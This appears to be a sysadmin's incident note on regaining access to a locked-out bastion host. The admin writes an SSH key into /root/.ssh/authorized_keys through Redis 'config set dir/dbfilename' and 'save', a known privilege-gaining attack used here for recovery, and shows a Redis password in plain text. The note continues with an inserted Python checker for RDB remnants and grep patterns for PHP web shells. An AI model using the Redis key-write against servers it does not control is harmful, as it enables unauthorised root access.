Symptom: the bastion host suddenly could not be logged into.
Fix: log in to Redis remotely with its password, use the Redis authorized_keys write to regain access to the box, then repair .ssh/authorized_keys.
Unauthenticated Redis access lets a remote party obtain server privileges.
Find a remote machine that is allowed to log in to Redis:
# ssh-keygen -t rsa
# cat .ssh/id_rsa.pub
…
# /usr/local/redis/bin/redis-cli -h x.x.x.x
> auth QW@FAEBSETYDWESE!@#
> config set dir /root/.ssh/
> config set dbfilename authorized_keys
> set xxxx "…"
> save
> exit
Once logged in normally, restart redis and restore the correct .ssh/authorized_keys.
Analysis:
1. Redis has a password and an IP whitelist, so a break-in by an attacker is unlikely.
2. Check the system logs:
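After restoring the file it is worth confirming that nothing from the Redis dump is left behind: a `save` over authorized_keys leaves the RDB magic "REDIS" and binary bytes around the injected key, which sshd tolerates but which is a clear indicator of this technique. The following check is an added example, not part of the original post; the sample file contents and the key blob are constructed.

```python
import re
from typing import List

# Accepts the common OpenSSH public key types; a single options field such as
# "no-pty" may precede the key (quoted options containing spaces are not handled).
_KEY_LINE = re.compile(
    r'^(?:\S+\s+)?'                                 # optional options field
    r'(ssh-(?:rsa|dss|ed25519)|ecdsa-sha2-nistp(?:256|384|521))\s+'
    r'([A-Za-z0-9+/]+={0,3})'                       # base64 key blob
    r'(?:\s+.*)?$'                                  # optional comment
)

def audit_authorized_keys(raw: bytes) -> List[str]:
    """Return findings for an authorized_keys file body.

    Flags the Redis RDB header, lines carrying non-text bytes, and lines
    that are not valid public key entries. An empty list means clean.
    """
    findings: List[str] = []
    if raw.startswith(b"REDIS"):
        findings.append("file begins with Redis RDB magic 'REDIS'")
    for lineno, line in enumerate(raw.split(b"\n"), start=1):
        if not line.strip():
            continue
        text = line.decode("ascii", errors="replace")
        if "\ufffd" in text or any(ord(c) < 32 for c in text if c != "\t"):
            findings.append(f"line {lineno}: non-text bytes (binary payload?)")
            continue
        if text.lstrip().startswith("#"):
            continue
        if not _KEY_LINE.match(text):
            findings.append(f"line {lineno}: not a valid public key entry: {text[:40]!r}")
    return findings

# Constructed sample: one legitimate key line.
GOOD_KEY = b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoodKeyBlobConstructed admin@bastion\n"
# Constructed approximation of what `save` leaves behind: RDB header and
# binary metadata, the injected key padded with newlines, then the RDB trailer.
RDB_SAMPLE = (b"REDIS0006\xfe\x00\x00\x04xxxx\x80\x00\x00\n\n"
              + GOOD_KEY + b"\n\n\xff\x12\x34\x56\x78\x9a\xbc\xde\xf0")

if __name__ == "__main__":
    for finding in audit_authorized_keys(RDB_SAMPLE):
        print(finding)
```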
# history
# tail -9500 /var/log/secure |grep -v zabbix |more
# tail -19000 /var/log/messages | grep -v "TCP" |grep -v "ratelimit"|more
# last -20
# find /var/www/apache/project/xxxx -name "*.php" |xargs grep "shell_exec" |more
# find /var/www/apache/project/xxxx -name "*.php" |xargs grep "passthru" |more
# find /var/www/apache/project/xxxx -name "*.php" |xargs grep "eval" |more
# find /var/www/apache/project/xxxx -name "*.php" |xargs grep "fsockopen" |more